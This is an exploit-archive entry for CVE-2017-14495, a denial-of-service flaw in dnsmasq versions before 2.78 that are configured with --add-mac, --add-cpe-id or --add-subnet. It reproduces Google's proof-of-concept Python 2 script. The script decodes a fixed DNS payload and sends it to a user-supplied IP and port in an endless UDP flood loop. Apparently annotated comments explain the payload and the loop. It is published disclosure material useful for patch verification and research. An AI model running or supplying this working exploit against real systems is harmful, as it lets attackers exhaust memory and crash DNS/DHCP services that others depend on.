Dnsmasq < 2.78 - Lack of free() Denial of Service

2017-10-02 21:05:04

'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

dnsmasq is vulnerable only if one of the following options is specified: --add-mac, --add-cpe-id or --add-subnet.

'''

#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/

import socket
import sys


def oom():
    """Return the fixed UDP payload this PoC sends, as a Python 2 ``str``.

    The hex blob below has its spaces and newlines stripped and is decoded
    with ``str.decode('hex')``, which exists only in Python 2 (under
    Python 3 this line raises AttributeError). One four-byte run is then
    rewritten in place before the 37-byte result is returned.
    """
    data = '''01 0d 08 1b 00 01 00 00 00 00 00 02 00 00 29 04
00 00 29 00 00 00 03 00 00 01 13 00 08 01 13 79
00 00 00 00 00
'''.replace(' ', '').replace('\n', '').decode('hex')
    # The searched-for run appears exactly once in the decoded blob
    # (bytes 24-27).  The replacement 7f 00 00 01 reads as the IPv4
    # address 127.0.0.1 in network byte order; the field it lands in is
    # not identified anywhere in this file.
    data = data.replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')
    return data

if __name__ == '__main__':
    # A usage error exits with status 0, so a wrapping script cannot
    # distinguish a bad invocation from a normal run.
    if len(sys.argv) != 3:
        print 'Usage: %s <ip> <port>' % sys.argv[0]
        sys.exit(0)

    ip = sys.argv[1]
    # int() raises ValueError on a non-numeric argument; the value is not
    # range-checked before it reaches sendto().
    port = int(sys.argv[2])

    packet = oom()

    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
    # Unbounded loop: there is no exit condition, so it ends only on an
    # exception or a signal and the s.close() below is never reached (the
    # descriptor is released at process exit instead).  The commented-out
    # 'break' looks like a single-shot toggle left by the author.
    while True:
        s.sendto(packet, (ip, port))
        #break
    s.close()
